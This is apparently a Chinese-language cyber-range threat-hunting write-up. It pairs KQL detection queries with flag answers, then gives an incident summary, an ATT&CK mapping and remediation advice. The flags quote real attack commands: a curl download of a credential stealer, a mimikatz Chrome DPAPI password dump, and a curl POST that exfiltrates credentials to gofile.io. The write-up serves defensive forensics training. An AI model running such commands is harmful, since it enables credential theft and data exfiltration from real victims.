**目标:** 量化创建的压缩包数量可以揭示数据窃取的范围,并有助于优先安排影响评估工作。
**Flag:** `8`
```
DeviceFileEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ActionType == "FileCreated"
| where InitiatingProcessFileName has_any ("7z.exe", "rar.exe", "WinRAR.exe", "tar.exe", "zip.exe")
| where FileName !has "PSScriptPolicyTest_"
| project TimeGenerated, DeviceName, ActionType, FolderPath
| order by TimeGenerated desc
```
***FLAG 20: 凭证访问 - 凭证窃取工具下载***
**目标:** 攻击者将专门的凭证窃取工具直接下载到被攻陷的系统中,根据目标环境调整其工具集。
**Flag:** `"curl.exe" -L -o m-temp.7z https://litter.catbox.moe/mt97cj.7z`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("curl", "wget", "certutil", "bitsadmin", "Invoke-WebRequest", "iwr")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated desc
```
***FLAG 21: 凭证访问 - 浏览器凭证窃取***
**目标:** 现代凭证窃取主要针对浏览器密码存储,在不触发针对 LSASS 的检测的情况下提取已保存的凭证。
**Flag:** `"m.exe" privilege::debug "dpapi::chrome /in:%localappdata%\Google\Chrome\User Data\Default\Login Data /unprotect" exit`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("mimikatz", "browser", "chrome", "edge", "logins", "theft")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated desc
```
***FLAG 22: 渗漏 - 数据上传命令***
**目标:** 基于表单的 HTTP 上传提供了简单、可靠的数据渗漏方式,能够与合法的 Web 流量融为一体,并支持大文件传输。
**Flag:** `"curl.exe" -X POST -F file=@credentials.tar.gz https://store1.gofile.io/uploadFile`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("curl", "Invoke-WebRequest", "iwr", "wget")
| where ProcessCommandLine has_any ("POST", "-F", "--form", "-X POST", "-Method Post")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated desc
```
***FLAG 23: 渗漏 - 云存储服务***
**目标:** 匿名文件共享服务提供了带有阅后即焚链接的临时存储,使数据恢复和溯源变得复杂。
**Flag:** `gofile.io`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any ("credentials.tar.gz")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated desc
```
***FLAG 24: 渗漏 - 目标服务器***
**目标:** 当基于域名的控制失败或被绕过时,IP 地址可用于网络层封锁和威胁情报关联。
**Flag:** `45.112.123.227`
```
DeviceNetworkEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ActionType == "ConnectionSuccess"
| where RemoteUrl has_any ("gofile")
| project TimeGenerated, DeviceName, RemoteIP, RemoteUrl
| order by TimeGenerated asc
```
***FLAG 25: 凭证访问 - 主密码提取***
**目标:** 密码管理器存储多个系统的凭证。提取主密码即可获得所有已存储机密的访问权限。
**Flag:** `KeePass-Master-Password.txt`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-14))
| where ProcessCommandLine has_any (".txt")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
## 2. 调查摘要
在初始文件服务器被攻破五天后,威胁行为者重返该环境并显著升级了入侵行为。攻击者使用之前被攻陷的账户 `yuki.tanaka`,从主机 `10.1.0.204` 横向移动到 `azuki-adminpc`(即 CEO 的行政工作站)—— 这是一个能够访问敏感财务和凭证数据的高价值目标。
在新目标上,攻击者部署了 **Meterpreter** 植入物(伪装为 `meterpreter.exe`),通过命名管道 (`msf-pipe-5902`) 进行通信,建立了持久的命令与控制 (C2)。为了在被发现后仍能维持访问权限,他们通过 base64 混淆命令创建了一个隐藏的本地管理员账户 `yuki.tanaka2`。
随后,攻击者进行了广泛的 **侦察**(通过 `qwinsta`、`nltest` 和 `netstat` 进行活动会话、域信任和网络枚举),随后定位并窃取了凭证存储库,包括 KeePass 数据库(`OLD-Passwords.txt`,`KeePass-Master-Password.txt`)以及使用基于 Mimikatz 的工具 (`m.exe`) 提取的 Chrome 浏览器凭证。
敏感文件(包括银行记录)通过 `Roboc` 被暂存到 `C:\ProgramData\Microsoft\Crypto\staging` 中,在那里使用 7-Zip 准备了 **8 个受密码保护的压缩包** 用于渗漏。被盗数据(包括 `credentials.tar.gz`)通过 HTTP POST 被渗漏至匿名文件共享服务 `gofile.io` (store1.gofile.io),其辅助基础设施关联到 IP `45.112.123.227`,并从之前识别的 C2 域名 `litter.catbox.moe` 进行了二次下载。
此次第二阶段的入侵标志着一次重大的升级:从初始的工作站被攻陷,到 CEO 级别的访问权限、部署持久化后门、凭证数据库被窃取,以及确认财务和身份验证数据遭到渗漏 —— 因此必须立即重置凭证、封锁 IOC,并对受影响的系统进行全面的取证审查。
## 3. MITRE ATT&CK 映射
| 战术 | 技术 | 证据 |
| ----------------------------------- | --------------------------------------------------------- | ------------------------------------------------ |
| 初始访问 / 横向移动 | T1078 - 有效账户 | 使用 yuki.tanaka 凭证 |
| 横向移动 | T1021 - 远程服务 | 从 10.1.0.204 跳板至 azuki-adminpc |
| 执行 | T1059 - 命令和脚本解释器 | Base64 编码的 cmd/PowerShell 命令 |
| 防御规避 | T1140 - 去混淆/解码文件或信息 | Base64 编码的账户创建命令 |
| 持久化 | T1136.001 - 创建账户:本地账户 | 创建 yuki.tanaka2 |
| 权限提升 | T1098 - 账户操纵(添加到管理员组) | 将 yuki.tanaka2 添加到管理员组 |
| 命令与控制 | T1071 / T1559 - 应用层协议 / IPC | Meterpreter 命名管道 msf-pipe-5902 |
| 命令与控制 / 资源开发 | T1105 - 入口工具传输 | curl.exe 从 litter.catbox.moe 下载 |
| 发现 | T1087 - 账户发现 | qwinsta.exe 会话枚举 |
| 发现 | T1482 - 域信任发现 | nltest.exe /domain_trusts |
| 发现 | T1049 - 系统网络连接发现 | netstat.exe -ano |
| 发现 | T1083 - 文件和目录发现 | 使用 where /r 搜索 .kdbx 文件 |
| 凭证访问 | T1555 - 来自密码存储的凭证 | KeePass 数据库, OLD-Passwords.txt |
| 凭证访问 | T1003.001 - 操作系统凭证转储 (DPAPI) | m.exe Chrome DPAPI 凭证提取 |
| 收集 | T1074.001 - 数据暂存 | 使用 Robocopy 转移至暂存目录 |
| 收集 | T1560.001 - 压缩收集的数据 | 7z.exe 创建 8 个受密码保护的压缩包 |
| 渗漏 | T1567.002 - 通过 Web 服务渗漏 (云存储) | curl POST 发送至 gofile.io |
## 4. 建议
### 立即行动
- 将 `azuki-adminpc` 和 `10.1.0.204` 从网络中隔离,以便进行取证镜像和分析。
- 强制重置 `yuki.tanaka` 以及所有在浏览器中保存密码或存储在 KeePass 中的账户密码(假设已全部被窃)。
- 识别并禁用/删除恶意的 `yuki.tanaka2` 账户;审核整个环境中所有的本地管理员组成员资格。
- 在防火墙/代理上封锁 C2/渗漏基础设施:`litter.catbox.moe, gofile.io` / `store1.gofile.io` 和 `45.112.123.227`。
- 终止所有正在运行的 `meterpreter.exe` 进程,并在其他主机上搜寻 `msf-pipe-5902` 命名管道模式。
- 在采取补救措施之前,保留易失性证据(内存、网络连接、进程列表)。
### 短期补救
- 在所有主机(尤其是管理员工作站)上进行全环境的 IOC 和 TTP 扫描(相同的压缩工具使用情况、curl 下载、暂存目录、命名管道模式)。
- 轮换存储在被攻陷的 KeePass 数据库中的所有凭证,并审查是否在各个系统中存在重复使用的情况。
- 限制/加白名单,禁止在非管理上下文中执行压缩和下载实用程序 (7z.exe, curl.exe, robocopy.exe)。
- 启用增强日志记录:带有命令行审计的进程创建、PowerShell 脚本块日志记录以及命名管道创建事件。
- 限制或监控发往匿名文件共享/存储服务(gofile.io、catbox.moe 及类似服务)的出站流量。
- 对受影响的终端(azuki-adminpc、最初被攻陷的文件服务器、10.1.0.204)进行重新镜像,而不是仅仅依赖清理操作。
### 长期补救
- 部署/强化 EDR,增加针对“先压缩后渗漏”模式、可疑命名管道和 DPAPI 凭证访问的行为检测。
- 实施特权访问管理 (PAM) 解决方案;移除常驻的本地管理员权限,尤其是在高管/行政工作站上。
- 实施网络分段,将高价值终端(高管 PC、文件服务器)与普通用户网段隔离。
- 强制所有特权账户使用 MFA,并摒弃明文凭证文件,转向带有审计追踪的企业级密码管理方案。
- 部署 DLP 控制措施,以检测批量暂存和压缩/归档数据的出站传输。
- 集成威胁情报源,在无业务访问需求的情况下主动封锁已知的基础设施(例如 catbox.moe、gofile.io 相关模式)。
- 定期开展紫队演练,以验证对本事件中发现的横向移动、持久化和渗漏 TTP 的检测覆盖率。
**报告状态:** 已完成
**下次审查:** 2025年12月23日
**分发范围:** Cyber Range标签:PE 加载器, 入侵分析, 安全事件报告, 库, 应急响应, 数字取证, 自动化脚本, 自定义DNS解析器